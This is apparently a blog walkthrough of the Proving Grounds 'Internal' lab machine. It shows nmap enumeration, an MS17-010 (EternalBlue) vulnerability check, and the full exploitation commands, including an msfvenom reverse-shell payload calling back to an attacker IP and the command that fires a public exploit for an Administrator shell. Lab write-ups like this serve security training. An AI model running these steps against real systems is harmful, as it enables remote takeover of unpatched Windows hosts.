PG - Internal

PG – Internal

In this walk through, we will be going through the Internal room from Proving Grounds. This room is rated as Easy on the platform and it consists of exploitation of MS17-010 (Eternal Blue) vulnerability to get root on the system. So, let’s get started without any delay.

Internal

Machine Info:

TitleInternal
IPaddress192.168.166.40
DifficultyEasy
OSWindows
DescriptionInternal is an Easy rated Window machine that is vulnerable to MS17-010 (Eternal Blue) exploit.

Enumeration:

  • I started off with my regular nmap aggressive scan and found multiple ports opened. Some interesting ones were – 135 (RPC), 139,445 (SMB), 3389 (RDP) and 5357 (HTTP).

$ sudo nmap -A 192.168.166.40
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-10 22:06 IST

Nmap scan report for 192.168.166.40
Host is up (0.20s latency).
Not shown: 987 closed ports
PORT      STATE    SERVICE            VERSION
53/tcp    filtered domain
135/tcp   open     msrpc              Microsoft Windows RPC
139/tcp   open     netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds       Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open     ssl/ms-wbt-server?
|_ssl-date: 2024-02-10T16:38:38+00:00; 0s from scanner time.
5357/tcp  open     http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
49152/tcp open     msrpc              Microsoft Windows RPC
49153/tcp open     msrpc              Microsoft Windows RPC
49154/tcp open     msrpc              Microsoft Windows RPC
49155/tcp open     msrpc              Microsoft Windows RPC
49156/tcp open     msrpc              Microsoft Windows RPC
49157/tcp open     msrpc              Microsoft Windows RPC
49158/tcp open     msrpc              Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/10%OT=135%CT=1%CU=30488%PV=Y%DS=4%DC=T%G=Y%TM=65C7A6
OS:C9%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10C%TS=7)OPS(O1=M54ENW8ST1
OS:1%O2=M54ENW8ST11%O3=M54ENW8NNT11%O4=M54ENW8ST11%O5=M54ENW8ST11%O6=M54EST
OS:11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80
OS:%W=2000%O=M54ENW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R
OS:=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7
OS:(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=EAEB%RUD=G)
OS:IE(R=N)

Network Distance: 4 hops
Service Info: Host: INTERNAL; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2

Host script results:
|_clock-skew: mean: 1h59m59s, deviation: 4h00m01s, median: -1s
|_nbstat: NetBIOS name: INTERNAL, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:ba:a1:8b (VMware)
| smb-os-discovery: 
|   OS: Windows Server (R) 2008 Standard 6001 Service Pack 1 (Windows Server (R) 2008 Standard 6.0)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: internal
|   NetBIOS computer name: INTERNAL\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-02-10T08:38:31-08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-02-10T16:38:30
|_  start_date: 2023-02-18T02:15:24

TRACEROUTE (using port 5900/tcp)
HOP RTT       ADDRESS
1   199.51 ms 192.168.45.1
2   199.54 ms 192.168.45.254
3   199.55 ms 192.168.251.1
4   200.44 ms 192.168.166.40

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 168.75 seconds

nmap scan

Host script results

  • I started my enumeration with SMB but got nothing back.

smbclient -L 192.168.166.40

smbmap -H 192.168.166.40

SMB Enumeration

  • Next, i used the nmap vulners script on the SMB port 445 to test for MS17-010 (Eternal Blue) and got positive hit on that.

$ sudo nmap -p445 --script smb-vuln-ms17-010 192.168.166.40
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-10 22:24 IST
Nmap scan report for 192.168.166.40
Host is up (0.21s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 3.07 seconds

vulners scan output

Exploitation & Getting root:

  • Checked for the EternalBlue exploits other than the Metasploit one. Found one in Exploit DB but it doesn’t seems to work. So, i used a different one from github.

EternalBlue exploit

  • Setup the exploit requirement using the below commands. The following commands will create a python2 virtual environment using pyenv, then will install the required impacket version on it. After that, we will download the exploit we are using here from github. Create the shell code using nasm and msfvenom. Then we will merge both the shell code in one file as required by the exploit. At last, fire the exploit on the target specifying its IP address.

# Activate a virtual environment

pyenv virtualenv 2.7.18 eternalblue 
pyenv activate eternalblue 
pip install impacket==0.9.22

# Clone the exploit

git clone https://github.com/worawit/MS17-010.git


# Create shell code

nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin

msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=192.168.45.207 --platform windows -a x86 --format raw -o sc_x86_payload.bin

cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin


# Fire the exploit

python2 eternalblue.py 192.168.166.40 sc_x86.bin

firing the exploit

  • We got a shell back as Administrator on our netcat listener. Captured the root flag and marked the machine as complete.

got root

proof flag

Also Read: PG – Image

Conclusion:

Conclusion

So that was “Internal” for you. We started off with a regular nmap scan and found multiple ports opened – 135 (RPC), 139,445 (SMB), 3389 (RDP) and 5357 (HTTP). Next also performed a vulners scan and found out that it is vulnerable to MS17-010 (Eternal Blue). Looked online for related exploit on Exploit-DB and fired it on the target to get root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top